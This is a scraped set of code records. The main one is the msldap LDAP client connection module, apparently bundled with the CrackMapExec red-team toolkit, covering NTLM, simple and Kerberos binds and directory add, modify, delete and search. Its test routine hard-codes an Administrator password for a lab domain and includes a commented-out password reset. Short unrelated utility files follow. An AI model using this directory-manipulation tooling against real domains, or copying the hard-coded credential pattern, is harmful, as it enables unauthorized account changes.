True:\n\t\t\t\tmessage_data, signature = await self.auth.encrypt(message_data, self.encryption_sequence_counter)\n\t\t\t\tmessage_data = signature + message_data\n\t\t\t\tmessage_data = len(message_data).to_bytes(4, byteorder = 'big', signed = False) + message_data\n\t\t\t\tself.encryption_sequence_counter += 1\n\t\t\telif self.__sign_messages is True:\n\t\t\t\tsignature = await self.auth.sign(message_data, self.encryption_sequence_counter)\n\t\t\t\tmessage_data = signature + message_data\n\t\t\t\tmessage_data = len(message_data).to_bytes(4, byteorder = 'big', signed = False) + message_data\n\t\t\t\tself.encryption_sequence_counter += 1\n\t\t\n\t\tself.message_table_notify[curr_msg_id] = asyncio.Event()\n\t\tawait self.network.out_queue.put(message_data)\n\n\t\treturn curr_msg_id\n\n\tasync def recv_message(self, message_id):\n\t\tif message_id not in self.message_table_notify:\n\t\t\tlogger.debug('Requested message id %s which is not in the message notify table!' % message_id)\n\t\t\treturn None\n\t\t#print('Waiting for %s' % message_id)\n\t\tawait self.message_table_notify[message_id].wait()\n\t\t#print(self.message_table)\n\t\tmessages = self.message_table[message_id]\n\n\t\t#print('%s arrived!' % message_id)\n\n\t\tself.message_table[message_id] = []\n\t\tself.message_table_notify[message_id].clear()\n\n\t\treturn messages\n\n\tasync def connect(self):\n\t\t\"\"\"\n\t\tConnects to the remote server. Establishes the session, but doesn't perform binding.\n\t\tThis function MUST be called first before the `bind` operation.\n\n\t\t:return: A tuple of (True, None) on success or (False, Exception) on error. 
\n\t\t:rtype: (:class:`bool`, :class:`Exception`)\n\t\t\"\"\"\n\t\ttry:\n\t\t\tlogger.debug('Connecting!')\n\t\t\tself.network = await MSLDAPNetworkSelector.select(self.target)\n\t\t\tres, err = await self.network.run()\n\t\t\tif res is False:\n\t\t\t\treturn False, err\n\t\t\t\n\t\t\t# now processing channel binding options\n\t\t\tif self.target.proto == LDAPProtocol.SSL:\n\t\t\t\tcertdata = self.network.get_peer_certificate()\n\t\t\t\t#cert = Certificate.load(certdata).native\n\t\t\t\t#print(cert)\n\t\t\t\tcb_struct = ChannelBindingsStruct()\n\t\t\t\tcb_struct.application_data = b'tls-server-end-point:' + sha256(certdata).digest()\n\n\t\t\t\tself.cb_data = cb_struct.to_bytes()\n\n\t\t\tself.handle_incoming_task = asyncio.create_task(self.__handle_incoming())\n\t\t\tlogger.debug('Connection successful!')\n\t\t\treturn True, None\n\t\texcept Exception as e:\n\t\t\treturn False, e\n\n\tasync def disconnect(self):\n\t\t\"\"\"\n\t\tTears down the connection.\n\n\t\t:return: Nothing\n\t\t:rtype: None\n\t\t\"\"\"\n\n\t\tlogger.debug('Disconnecting!')\n\t\tself.bind_ok = False\n\t\tself.handle_incoming_task.cancel()\n\t\tawait self.network.terminate()\n\n\n\tdef __bind_success(self):\n\t\t\"\"\"\n\t\tInternal function invoked after bind finished. \n\t\tInstructs the network layer that upcoming messages might be wrapped\n\t\t\"\"\"\n\t\tlogger.debug('BIND Success!')\n\t\tself.bind_ok = True\n\t\tif self.creds.auth_method in MSLDAP_GSS_METHODS or self.creds.auth_method == LDAPAuthProtocol.SICILY:\n\t\t\tself.__sign_messages = self.auth.signing_needed()\n\t\t\tself.__encrypt_messages = self.auth.encryption_needed()\n\t\t\tif self.__encrypt_messages or self.__sign_messages:\n\t\t\t\tself.network.is_plain_msg = False\n\n\tasync def bind(self):\n\t\t\"\"\"\n\t\tPerforms the bind operation.\n\t\tThis is where the authentication happens. Remember to call `connect` before this function!\n\n\t\t:return: A tuple of (True, None) on success or (False, Exception) on error. \n\t\t:rtype: (:class:`bool`, :class:`Exception`)\n\t\t\"\"\"\n\t\tlogger.debug('BIND in progress...')\n\t\ttry:\n\t\t\tif self.creds.auth_method == LDAPAuthProtocol.SICILY:\n\t\t\t\t\n\t\t\t\tdata, to_continue, err = await self.auth.authenticate(None)\n\t\t\t\tif err is not None:\n\t\t\t\t\treturn None, err\n\n\t\t\t\tauth = {\n\t\t\t\t\t'sicily_disco' : b''\n\t\t\t\t}\n\n\t\t\t\tbindreq = {\n\t\t\t\t\t'version' : 3,\n\t\t\t\t\t'name' : 'NTLM'.encode(),\n\t\t\t\t\t'authentication': AuthenticationChoice(auth), \n\t\t\t\t}\n\n\t\t\t\tbr = { 'bindRequest' : BindRequest( bindreq\t)}\n\t\t\t\tmsg = { 'protocolOp' : protocolOp(br)}\n\t\t\t\t\n\t\t\t\tmsg_id = await self.send_message(msg)\n\t\t\t\tres = await self.recv_message(msg_id)\n\t\t\t\tres = res[0]\n\t\t\t\tif isinstance(res, Exception):\n\t\t\t\t\treturn False, res\n\t\t\t\tres = res.native\n\t\t\t\tif res['protocolOp']['resultCode'] != 'success':\n\t\t\t\t\treturn False, Exception(\n\t\t\t\t\t\t'BIND failed! 
Result code: \"%s\" Reason: \"%s\"' % (\n\t\t\t\t\t\t\tres['protocolOp']['resultCode'], \n\t\t\t\t\t\t\tres['protocolOp']['diagnosticMessage']\n\t\t\t\t\t\t))\n\t\t\t\t\n\t\t\t\tauth = {\n\t\t\t\t\t'sicily_nego' : data\n\t\t\t\t}\n\n\t\t\t\tbindreq = {\n\t\t\t\t\t'version' : 3,\n\t\t\t\t\t'name' : 'NTLM'.encode(),\n\t\t\t\t\t'authentication': AuthenticationChoice(auth), \n\t\t\t\t}\n\n\t\t\t\tbr = { 'bindRequest' : BindRequest( bindreq\t)}\n\t\t\t\tmsg = { 'protocolOp' : protocolOp(br)}\n\t\t\t\t\n\t\t\t\tmsg_id = await self.send_message(msg)\n\t\t\t\tres = await self.recv_message(msg_id)\n\t\t\t\tres = res[0]\n\t\t\t\tif isinstance(res, Exception):\n\t\t\t\t\treturn False, res\n\t\t\t\tres = res.native\n\t\t\t\tif res['protocolOp']['resultCode'] != 'success':\n\t\t\t\t\treturn False, Exception(\n\t\t\t\t\t\t'BIND failed! Result code: \"%s\" Reason: \"%s\"' % (\n\t\t\t\t\t\t\tres['protocolOp']['resultCode'], \n\t\t\t\t\t\t\tres['protocolOp']['diagnosticMessage']\n\t\t\t\t\t\t))\n\n\t\t\t\tdata, to_continue, err = await self.auth.authenticate(res['protocolOp']['matchedDN'])\n\t\t\t\tif err is not None:\n\t\t\t\t\treturn None, err\n\n\t\t\t\tauth = {\n\t\t\t\t\t'sicily_resp' : data\n\t\t\t\t}\n\n\t\t\t\tbindreq = {\n\t\t\t\t\t'version' : 3,\n\t\t\t\t\t'name' : 'NTLM'.encode(),\n\t\t\t\t\t'authentication': AuthenticationChoice(auth), \n\t\t\t\t}\n\n\t\t\t\tbr = { 'bindRequest' : BindRequest( bindreq\t)}\n\t\t\t\tmsg = { 'protocolOp' : protocolOp(br)}\n\t\t\t\t\n\t\t\t\tmsg_id = await self.send_message(msg)\n\t\t\t\tres = await self.recv_message(msg_id)\n\t\t\t\tres = res[0]\n\t\t\t\tif isinstance(res, Exception):\n\t\t\t\t\treturn False, res\n\t\t\t\tres = res.native\n\t\t\t\tif res['protocolOp']['resultCode'] != 'success':\n\t\t\t\t\treturn False, Exception(\n\t\t\t\t\t\t'BIND failed! Result code: \"%s\" Reason: \"%s\"' % (\n\t\t\t\t\t\t\tres['protocolOp']['resultCode'], \n\t\t\t\t\t\t\tres['protocolOp']['diagnosticMessage']\n\t\t\t\t\t\t))\n\t\t\t\t\n\n\t\t\t\tself.__bind_success()\n\t\t\t\treturn True, None\n\n\t\t\telif self.creds.auth_method == LDAPAuthProtocol.SIMPLE:\n\t\t\t\tpw = b''\n\t\t\t\tif self.auth.password != None:\n\t\t\t\t\tpw = self.auth.password.encode()\n\n\t\t\t\tuser = b''\n\t\t\t\tif self.auth.username != None:\n\t\t\t\t\tuser = self.auth.username.encode()\n\n\t\t\t\tauth = {\n\t\t\t\t\t'simple' : pw\n\t\t\t\t}\n\n\t\t\t\tbindreq = {\n\t\t\t\t\t'version' : 3,\n\t\t\t\t\t'name': user,\n\t\t\t\t\t'authentication': AuthenticationChoice(auth), \n\t\t\t\t}\n\n\t\t\t\tbr = { 'bindRequest' : BindRequest( bindreq\t)}\n\t\t\t\tmsg = { 'protocolOp' : protocolOp(br)}\n\t\t\t\t\t\n\t\t\t\tmsg_id = await self.send_message(msg)\n\t\t\t\tres = await self.recv_message(msg_id)\n\t\t\t\tres = res[0]\n\t\t\t\tif isinstance(res, Exception):\n\t\t\t\t\treturn False, res\n\t\t\t\tres = res.native\n\t\t\t\tif res['protocolOp']['resultCode'] == 'success':\n\t\t\t\t\tself.__bind_success()\n\t\t\t\t\treturn True, None\n\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\treturn False, Exception(\n\t\t\t\t\t\t'BIND failed! 
Result code: \"%s\" Reason: \"%s\"' % (\n\t\t\t\t\t\t\tres['protocolOp']['resultCode'], \n\t\t\t\t\t\t\tres['protocolOp']['diagnosticMessage']\n\t\t\t\t\t\t))\n\n\t\t\telif self.creds.auth_method in MSLDAP_GSS_METHODS:\n\t\t\t\tchallenge = None\n\t\t\t\twhile True:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tdata, to_continue, err = await self.auth.authenticate(challenge, cb_data = self.cb_data)\n\t\t\t\t\t\tif err is not None:\n\t\t\t\t\t\t\traise err\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\treturn False, e\n\t\t\t\t\t\n\t\t\t\t\tsasl = {\n\t\t\t\t\t\t'mechanism' : 'GSS-SPNEGO'.encode(),\n\t\t\t\t\t\t'credentials' : data,\n\t\t\t\t\t}\n\t\t\t\t\tauth = {\n\t\t\t\t\t\t'sasl' : SaslCredentials(sasl)\n\t\t\t\t\t}\n\n\t\t\t\t\tbindreq = {\n\t\t\t\t\t\t'version' : 3,\n\t\t\t\t\t\t'name': b'',\n\t\t\t\t\t\t'authentication': AuthenticationChoice(auth), \n\t\t\t\t\t}\n\n\t\t\t\t\tbr = { 'bindRequest' : BindRequest( bindreq\t)}\n\t\t\t\t\tmsg = { 'protocolOp' : protocolOp(br)}\n\t\t\t\t\t\n\t\t\t\t\tmsg_id = await self.send_message(msg)\n\t\t\t\t\tres = await self.recv_message(msg_id)\n\t\t\t\t\tres = res[0]\n\t\t\t\t\tif isinstance(res, Exception):\n\t\t\t\t\t\treturn False, res\n\t\t\t\t\tres = res.native\n\t\t\t\t\tif res['protocolOp']['resultCode'] == 'success':\n\t\t\t\t\t\tif 'serverSaslCreds' in res['protocolOp']:\n\t\t\t\t\t\t\tdata, _, err = await self.auth.authenticate(res['protocolOp']['serverSaslCreds'], cb_data = self.cb_data)\n\t\t\t\t\t\t\tif err is not None:\n\t\t\t\t\t\t\t\treturn False, err\n\n\t\t\t\t\t\tself.encryption_sequence_counter = self.auth.get_seq_number()\n\t\t\t\t\t\tself.__bind_success()\n\n\t\t\t\t\t\treturn True, None\n\n\t\t\t\t\telif res['protocolOp']['resultCode'] == 'saslBindInProgress':\n\t\t\t\t\t\tchallenge = res['protocolOp']['serverSaslCreds']\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn False, Exception(\n\t\t\t\t\t\t\t'BIND failed! Result code: \"%s\" Reason: \"%s\"' % (\n\t\t\t\t\t\t\t\tres['protocolOp']['resultCode'], \n\t\t\t\t\t\t\t\tres['protocolOp']['diagnosticMessage']\n\t\t\t\t\t\t\t))\n\t\t\t\t\t\n\t\t\telse:\n\t\t\t\traise Exception('Not implemented authentication method: %s' % self.creds.auth_method.name)\n\t\texcept Exception as e:\n\t\t\treturn False, e\n\n\tasync def add(self, entry, attributes):\n\t\t\"\"\"\n\t\tPerforms the add operation.\n\t\t\n\t\t:param entry: The DN of the object to be added\n\t\t:type entry: str\n\t\t:param attributes: Attributes to be used in the operation\n\t\t:type attributes: dict\n\t\t:return: A tuple of (True, None) on success or (False, Exception) on error. \n\t\t:rtype: (:class:`bool`, :class:`Exception`)\n\t\t\"\"\"\n\t\ttry:\n\t\t\treq = {\n\t\t\t\t'entry' : entry.encode(),\n\t\t\t\t'attributes' : encode_attributes(attributes)\n\t\t\t}\n\t\t\tbr = { 'addRequest' : AddRequest(req)}\n\t\t\tmsg = { 'protocolOp' : protocolOp(br)}\n\t\t\t\n\t\t\tmsg_id = await self.send_message(msg)\n\t\t\tresults = await self.recv_message(msg_id)\n\t\t\tif isinstance(results[0], Exception):\n\t\t\t\treturn False, results[0]\n\t\t\t\n\t\t\tfor message in results:\n\t\t\t\tmsg_type = message['protocolOp'].name\n\t\t\t\tmessage = message.native\n\t\t\t\tif msg_type == 'addResponse':\n\t\t\t\t\tif message['protocolOp']['resultCode'] != 'success':\n\t\t\t\t\t\treturn False, Exception('Failed to add DN! LDAP error! 
Reason: %s Diag: %s' % (\n\t\t\t\t\t\t\tmessage['protocolOp']['resultCode'],\n\t\t\t\t\t\t\tmessage['protocolOp']['diagnosticMessage'])\n\t\t\t\t\t\t)\n\n\t\t\treturn True, None\n\t\texcept Exception as e:\n\t\t\treturn False, e\n\n\tasync def modify(self, entry, changes, controls = None):\n\t\t\"\"\"\n\t\tPerforms the modify operation.\n\t\t\n\t\t:param entry: The DN of the object whose attributes are to be modified\n\t\t:type entry: str\n\t\t:param changes: Describes the changes to be made on the object. Must be a dictionary of the following format: {'attribute': [('change_type', [value])]}\n\t\t:type changes: dict\n\t\t:param controls: additional controls to be passed in the query\n\t\t:type controls: dict\n\t\t:return: A tuple of (True, None) on success or (False, Exception) on error. \n\t\t:rtype: (:class:`bool`, :class:`Exception`)\n\t\t\"\"\"\n\t\ttry:\n\t\t\treq = {\n\t\t\t\t'object' : entry.encode(),\n\t\t\t\t'changes' : encode_changes(changes)\n\t\t\t}\n\t\t\tbr = { 'modifyRequest' : ModifyRequest(req)}\n\t\t\tmsg = { 'protocolOp' : protocolOp(br)}\n\t\t\tif controls is not None:\n\t\t\t\tmsg['controls'] = controls\n\t\t\t\n\t\t\tmsg_id = await self.send_message(msg)\n\t\t\tresults = await self.recv_message(msg_id)\n\t\t\tif isinstance(results[0], Exception):\n\t\t\t\treturn False, results[0]\n\t\t\t\n\t\t\tfor message in results:\n\t\t\t\tmsg_type = message['protocolOp'].name\n\t\t\t\tmessage = message.native\n\t\t\t\tif msg_type == 'modifyResponse':\n\t\t\t\t\tif message['protocolOp']['resultCode'] != 'success':\n\t\t\t\t\t\treturn False, Exception('Failed to modify DN! LDAP error! Reason: %s Diag: %s' % (\n\t\t\t\t\t\t\tmessage['protocolOp']['resultCode'],\n\t\t\t\t\t\t\tmessage['protocolOp']['diagnosticMessage'])\n\t\t\t\t\t\t)\n\n\t\t\treturn True, None\n\t\texcept Exception as e:\n\t\t\treturn False, e\n\n\tasync def delete(self, entry):\n\t\t\"\"\"\n\t\tPerforms the delete operation.\n\t\t\n\t\t:param entry: The DN of the object to be deleted\n\t\t:type entry: str\n\t\t:return: A tuple of (True, None) on success or (False, Exception) on error. \n\t\t:rtype: (:class:`bool`, :class:`Exception`)\n\t\t\"\"\"\n\t\ttry:\n\t\t\tbr = { 'delRequest' : DelRequest(entry.encode())}\n\t\t\tmsg = { 'protocolOp' : protocolOp(br)}\n\t\t\t\n\t\t\tmsg_id = await self.send_message(msg)\n\t\t\tresults = await self.recv_message(msg_id)\n\t\t\tif isinstance(results[0], Exception):\n\t\t\t\treturn False, results[0]\n\t\t\t\n\t\t\tfor message in results:\n\t\t\t\tmsg_type = message['protocolOp'].name\n\t\t\t\tmessage = message.native\n\t\t\t\tif msg_type == 'delResponse':\n\t\t\t\t\tif message['protocolOp']['resultCode'] != 'success':\n\t\t\t\t\t\treturn False, Exception('Failed to delete DN! LDAP error! 
Reason: %s Diag: %s' % (\n\t\t\t\t\t\t\tmessage['protocolOp']['resultCode'],\n\t\t\t\t\t\t\tmessage['protocolOp']['diagnosticMessage'])\n\t\t\t\t\t\t)\n\n\t\t\treturn True, None\n\t\texcept Exception as e:\n\t\t\treturn False, e\n\t\n\tasync def search(self, base, query, attributes, search_scope = 2, size_limit = 1000, types_only = False, derefAliases = 0, timeLimit = None, controls = None, return_done = False):\n\t\t\"\"\"\n\t\tPerforms the search operation.\n\t\t\n\t\t:param base: base tree on which the search should be performed\n\t\t:type base: str\n\t\t:param query: filter query that defines what should be searched for\n\t\t:type query: str\n\t\t:param attributes: a list of attributes to be included in the response\n\t\t:type attributes: List[str]\n\t\t:param search_scope: Specifies the search operation's scope. Default: 2 (Subtree)\n\t\t:type search_scope: int\n\t\t:param types_only: indicates whether the entries returned should include attribute types only or both types and values. Default: False (both)\n\t\t:type types_only: bool\n\t\t:param size_limit: Size limit of result elements per query. Default: 1000\n\t\t:type size_limit: int\n\t\t:param derefAliases: Specifies the behavior on how aliases are dereferenced. Default: 0 (never)\n\t\t:type derefAliases: int\n\t\t:param timeLimit: Maximum time the search should take. If the time limit is reached, the server SHOULD return an error\n\t\t:type timeLimit: int\n\t\t:param controls: additional controls to be passed in the query\n\t\t:type controls: dict\n\t\t:param return_done: Controls whether the final 'done' LDAP message should be returned, or just the actual results\n\t\t:type return_done: bool\n\n\t\t:return: Async generator which yields (`LDAPMessage`, None) tuple on success or (None, `Exception`) on error\n\t\t:rtype: Iterator[(:class:`LDAPMessage`, :class:`Exception`)]\n\t\t\"\"\"\n\t\tif self.status != MSLDAPClientStatus.RUNNING:\n\t\t\tyield None, Exception('Connection not running! 
Probably encountered an error')\n\t\t\treturn\n\t\ttry:\n\t\t\tif timeLimit is None:\n\t\t\t\ttimeLimit = 600 #not sure\n\n\t\t\tflt = query_syntax_converter(query)\n\t\t\t\n\t\t\tsearchreq = {\n\t\t\t\t'baseObject' : base.encode(),\n\t\t\t\t'scope': search_scope,\n\t\t\t\t'derefAliases': derefAliases, \n\t\t\t\t'sizeLimit': size_limit,\n\t\t\t\t'timeLimit': timeLimit,\n\t\t\t\t'typesOnly': types_only,\n\t\t\t\t'filter': flt,\n\t\t\t\t'attributes': attributes,\n\t\t\t}\n\n\t\t\tbr = { 'searchRequest' : SearchRequest( searchreq\t)}\n\t\t\tmsg = { 'protocolOp' : protocolOp(br)}\n\t\t\tif controls is not None:\n\t\t\t\tmsg['controls'] = controls\n\n\t\t\tmsg_id = await self.send_message(msg)\n\t\t\t\n\t\t\twhile True:\n\t\t\t\tresults = await self.recv_message(msg_id)\n\t\t\t\tfor message in results:\n\t\t\t\t\tmsg_type = message['protocolOp'].name\n\t\t\t\t\tmessage = message.native\n\t\t\t\t\tif msg_type == 'searchResDone':\n\t\t\t\t\t\t#print(message)\n\t\t\t\t\t\t#print('BREAKING!')\n\t\t\t\t\t\tif return_done is True:\n\t\t\t\t\t\t\tyield (message, None)\n\t\t\t\t\t\tbreak\n\t\t\t\t\t\n\t\t\t\t\telif msg_type == 'searchResRef':\n\t\t\t\t\t\t#TODO: Check if we need to deal with this further\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tif return_done is True:\n\t\t\t\t\t\tyield (message, None)\n\t\t\t\t\telse:\n\t\t\t\t\t\tyield (convert_result(message['protocolOp']), None)\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t\tbreak\n\t\t\n\t\texcept Exception as e:\n\t\t\tyield (None, e)\n\n\tasync def pagedsearch(self, base, query, attributes, search_scope = 2, size_limit = 1000, typesOnly = False, derefAliases = 0, timeLimit = None, controls = None):\n\t\t\"\"\"\n\t\tPaged search is the same as the search operation and uses it under the hood. Adds automatic control to read all results in a paged manner.\n\t\t\n\t\t:param base: base tree on which the search should be performed\n\t\t:type base: str\n\t\t:param query: filter query that defines what should be searched for\n\t\t:type query: str\n\t\t:param attributes: a list of attributes to be included in the response\n\t\t:type attributes: List[str]\n\t\t:param search_scope: Specifies the search operation's scope. Default: 2 (Subtree)\n\t\t:type search_scope: int\n\t\t:param types_only: indicates whether the entries returned should include attribute types only or both types and values. Default: False (both)\n\t\t:type types_only: bool\n\t\t:param size_limit: Size limit of result elements per query. Default: 1000\n\t\t:type size_limit: int\n\t\t:param derefAliases: Specifies the behavior on how aliases are dereferenced. Default: 0 (never)\n\t\t:type derefAliases: int\n\t\t:param timeLimit: Maximum time the search should take. If time limit reached the server SHOULD return an error\n\t\t:type timeLimit: int\n\t\t:param controls: additional controls to be passed in the query\n\t\t:type controls: dict\n\t\t:return: Async generator which yields (`dict`, None) tuple on success or (None, `Exception`) on error\n\t\t:rtype: Iterator[(:class:`dict`, :class:`Exception`)]\n\t\t\"\"\"\n\t\t\n\t\tif self.status != MSLDAPClientStatus.RUNNING:\n\t\t\tyield None, Exception('Connection not running! 
Probably encountered an error')\n\t\t\treturn\n\t\ttry:\n\t\t\tcookie = b''\n\t\t\twhile True:\n\t\t\t\t\n\t\t\t\tctrl_list_temp = [\n\t\t\t\t\tControl({\n\t\t\t\t\t\t'controlType' : b'1.2.840.113556.1.4.319',\n\t\t\t\t\t\t'controlValue': SearchControlValue({\n\t\t\t\t\t\t\t'size' : size_limit,\n\t\t\t\t\t\t\t'cookie': cookie\n\t\t\t\t\t\t}).dump()\n\t\t\t\t\t})\n\t\t\t\t]\n\t\t\t\tif controls is not None:\n\t\t\t\t\tctrl_list_temp.extend(controls)\n\t\t\t\t\n\t\t\t\tctrs = Controls(\n\t\t\t\t\tctrl_list_temp\n\t\t\t\t)\n\n\n\t\t\t\tasync for res, err in self.search(\n\t\t\t\t\tbase, \n\t\t\t\t\tquery, \n\t\t\t\t\tattributes, \n\t\t\t\t\tsearch_scope = search_scope, \n\t\t\t\t\tsize_limit=size_limit, \n\t\t\t\t\ttypes_only=typesOnly, \n\t\t\t\t\tderefAliases=derefAliases, \n\t\t\t\t\ttimeLimit=timeLimit, \n\t\t\t\t\tcontrols = ctrs,\n\t\t\t\t\treturn_done = True\n\t\t\t\t\t):\n\t\t\t\t\t\tif err is not None:\n\t\t\t\t\t\t\tyield (None, err)\n\t\t\t\t\t\t\treturn\n\n\t\t\t\t\t\tif 'resultCode' in res['protocolOp']:\n\t\t\t\t\t\t\tfor control in res['controls']:\n\t\t\t\t\t\t\t\tif control['controlType'] == b'1.2.840.113556.1.4.319':\n\t\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t\tcookie = SearchControlValue.load(control['controlValue']).native['cookie']\n\t\t\t\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\t\t\t\traise e\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\traise Exception('SearchControl missing from server response!')\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tyield (convert_result(res['protocolOp']), None)\n\n\t\t\t\tif cookie == b'':\n\t\t\t\t\tbreak\n\t\t\n\t\texcept Exception as e:\n\t\t\tyield (None, e)\n\n\n\tasync def get_serverinfo(self):\n\t\tif self.status != MSLDAPClientStatus.RUNNING:\n\t\t\treturn None, Exception('Connection not running! 
Probably encountered an error')\n\n\t\tattributes = [\n\t\t\tb'subschemaSubentry',\n \t\tb'dsServiceName',\n \t\tb'namingContexts',\n \t\tb'defaultNamingContext',\n \t\tb'schemaNamingContext',\n \t\tb'configurationNamingContext',\n \t\tb'rootDomainNamingContext',\n \t\tb'supportedControl',\n \t\tb'supportedLDAPVersion',\n \t\tb'supportedLDAPPolicies',\n \t\tb'supportedSASLMechanisms',\n \t\tb'dnsHostName',\n \t\tb'ldapServiceName',\n \t\tb'serverName',\n \t\tb'supportedCapabilities'\n\t\t]\n\n\t\tfilt = { 'present' : 'objectClass'.encode() }\n\t\tsearchreq = {\n\t\t\t'baseObject' : b'',\n\t\t\t'scope': 0,\n\t\t\t'derefAliases': 0, \n\t\t\t'sizeLimit': 1,\n\t\t\t'timeLimit': self.target.timeout - 1,\n\t\t\t'typesOnly': False,\n\t\t\t'filter': Filter(filt),\n\t\t\t'attributes': attributes,\n\t\t}\n\n\t\tbr = { 'searchRequest' : SearchRequest( searchreq\t)}\n\t\tmsg = { 'protocolOp' : protocolOp(br)}\n\n\t\tmsg_id = await self.send_message(msg)\n\t\tres = await self.recv_message(msg_id)\n\t\tres = res[0]\n\t\tif isinstance(res, Exception):\n\t\t\treturn None, res\n\t\t\n\t\t#print('res')\n\t\t#print(res)\n\t\treturn convert_attributes(res.native['protocolOp']['attributes']), None\n\n\nasync def amain():\n\timport traceback\n\tfrom msldap.commons.url import MSLDAPURLDecoder\n\n\tbase = 'DC=TEST,DC=CORP'\n\n\t#ip = 'WIN2019AD'\n\t#domain = 'TEST'\n\t#username = 'victim'\n\t#password = 'Passw0rd!1'\n\t##auth_method = LDAPAuthProtocol.SICILY\n\t#auth_method = LDAPAuthProtocol.SIMPLE\n\n\t#cred = MSLDAPCredential(domain, username, password , auth_method)\n\t#target = MSLDAPTarget(ip)\n\t#target.dc_ip = '10.10.10.2'\n\t#target.domain = 'TEST'\n\n\turl = 'ldaps+ntlm-password://test\\\\Administrator:QLFbT8zkiFGlJuf0B3Qq@WIN2019AD/?dc=10.10.10.2'\n\n\tdec = MSLDAPURLDecoder(url)\n\tcred = dec.get_credential()\n\ttarget = dec.get_target()\n\n\tprint(cred)\n\tprint(target)\n\n\tinput()\n\n\tclient = MSLDAPClientConnection(target, cred)\n\tawait client.connect()\n\tres, err = await client.bind()\n\tif err is not None:\n\t\traise err\n\t\n\tuser = \"CN=ldaptest_2,CN=Users,DC=test,DC=corp\"\n\t#attributes = {'objectClass': ['inetOrgPerson', 'posixGroup', 'top'], 'sn': 'user_sn', 'gidNumber': 0}\n\t#res, err = await client.add(user, attributes)\n\t#if err is not None:\n\t#\tprint(err)\n\n\t#changes = {\n\t#\t'unicodePwd': [('replace', ['\"TESTPassw0rd!1\"'])],\n\t#\t#'lockoutTime': [('replace', [0])]\n\t#}\n\n\t#res, err = await client.modify(user, changes)\n\t#if err is not None:\n\t#\tprint('ERR! %s' % err)\n\t#else:\n\t#\tprint('OK!')\n\t\n\tres, err = await client.delete(user)\n\tif err is not None:\n\t\tprint('ERR! 
%s' % err)\n\t\n\tawait client.disconnect()\n\n\n\nif __name__ == '__main__':\n\tfrom msldap import logger\n\tfrom msldap.commons.credential import MSLDAPCredential, LDAPAuthProtocol\n\tfrom msldap.commons.target import MSLDAPTarget\n\tfrom msldap.protocol.query import query_syntax_converter\n\n\tlogger.setLevel(2)\n\n\n\tasyncio.run(amain())\n\n\t\n\n\t\t\t\n\t\t\t\n\n\t\t","repo_name":"ryanmrestivo/red-team","sub_path":"Exploitation-Tools/CrackMapExec/site-packages/msldap/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":25003,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"70574826933","text":"import logging # log generation\nimport datetime\n \ndef logfilesetup(logname):\n    \n    # Create logger\n    # breakpoint()    \n    logger = logging.getLogger()\n    logger.setLevel(logging.DEBUG)\n\n    # File handler which logs info-level and above messages\n    d = datetime.datetime.today()\n    d = d.strftime('%Y%m%d')\n    \n    _LOG_FILEPATH_ = \"logs/\"\n    _LOG_INFO_FILENAME_ = \"%s_%s.log\"%(d,(logname.replace('.py','')))\n    \n    fh = logging.FileHandler(_LOG_FILEPATH_ + _LOG_INFO_FILENAME_)\n    fh.setLevel(logging.INFO)\n\n    # Console handler with a higher log level\n    ch = logging.StreamHandler()\n    ch.setLevel(logging.ERROR)\n    \n    # Create formatter and add it to handlers\n    _LOG_FORMAT_ = \"[%(asctime)s] %(levelname)5s %(message)s (%(filename)s:%(funcName)s():%(lineno)s)\"\n    formatter = logging.Formatter(_LOG_FORMAT_)\n    fh.setFormatter(formatter)\n    ch.setFormatter(formatter)\n\n    # Add handlers to logger\n    logger.addHandler(fh)\n    logger.addHandler(ch)\n\n    # breakpoint()\n    \n    return logger\n\n","repo_name":"avelezd/hdf5_lab","sub_path":"experimental/mylogsetup.py","file_name":"mylogsetup.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6484030113","text":"#!/usr/bin/python3\n# coding=utf-8\n\"\"\"\n\n@Time    : 18-10-16 12:19 PM\n@Author  : qcymkxyc\n@Email   : qcymkxyc@163.com\n@File    : my4.py\n@Software: PyCharm\n\nRelated problem 2\n\n\"\"\"\n\n\ndef transform_count(m, n):\n    \"\"\"Count how many bits of m's binary representation must be changed to obtain n\n\n    :param m: int\n        m\n    :param n: int\n        n\n    :return: int\n        the number of bits changed\n    \"\"\"\n    # XOR yields the differing bits\n    diff_bin = m ^ n\n\n    # count the set bits\n    count = 0\n    while diff_bin:\n        count += 1\n        diff_bin = (diff_bin - 1) & diff_bin\n\n    return count\n","repo_name":"qcymkxyc/JZoffer","sub_path":"main/question15/my4.py","file_name":"my4.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33745986416","text":"# coding: utf-8\n\n\"\"\"\n    Grafana HTTP API.\n\n    The Grafana backend exposes an HTTP API, the same API is used by the frontend to do everything from saving dashboards, creating users and updating data sources. 
# noqa: E501\n\n OpenAPI spec version: 0.0.1\n Contact: hello@grafana.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom swagger_client.configuration import Configuration\n\n\nclass AlertTestResult(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'condition_evals': 'str',\n 'error': 'str',\n 'firing': 'bool',\n 'logs': 'list[AlertTestResultLog]',\n 'matches': 'list[EvalMatch]',\n 'state': 'AlertStateType',\n 'time_ms': 'str'\n }\n\n attribute_map = {\n 